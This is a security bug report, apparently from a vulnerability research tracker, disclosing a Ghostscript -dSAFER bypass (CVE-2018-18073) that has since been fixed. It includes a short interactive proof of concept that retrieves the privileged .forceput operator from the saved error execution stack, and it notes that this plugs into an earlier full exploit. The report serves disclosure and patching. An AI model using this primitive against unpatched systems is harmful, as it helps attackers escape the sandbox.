New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Fixed
Closed: Oct 10

Sign in to add a comment

Issue 1690: ghostscript: $error object can expose system operators in saved execution stack.

Reported by, Oct 9 Project Member

Issue description

I've found a way of getting access to .forceput even after the fix in  bug 1682 , you can pull it out of the saved execution stack in $error:

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) (r) --.systemvmfile--} --stopped-- {--pop-- --pop-- $error /errorname --get-- /undefinedfilename --eq-- {.clearerror --exit--} --if-- /handleerror --.systemvar-- --exec-- null} --if-- --cvx-- {.runexec} .execute --pop--} --%loop_continue-- {--pop--} {$error /newerror --get-- --and-- {/handleerror --.systemvar-- --exec-- --flush-- true} {false} --ifelse--} false 1 --%stopped_push-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1919 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]

Notice the .forceput in there...

GS>$error /estack get 29 get ==
{-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}
GS>$error /estack get 29 get 6 get ==

See  bug 1682  for a full exploit using .forceput, this code can just be plugged in and the full exploit will still work.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Comment 1 by, Oct 9

Project Member
Labels: CVE-2018-18073
This is CVE-2018-18073.

Comment 2 by, Oct 10

Project Member
Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed now with this patch, I'll send a heads-up to oss-security.;a=commit;h=34cc326eb2c5695833361887fe0b32e8d987741c

Sign in to add a comment